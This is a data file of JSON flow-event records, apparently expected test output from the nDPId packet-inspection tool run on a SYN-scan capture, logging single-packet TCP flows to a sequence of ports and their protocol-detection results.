-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 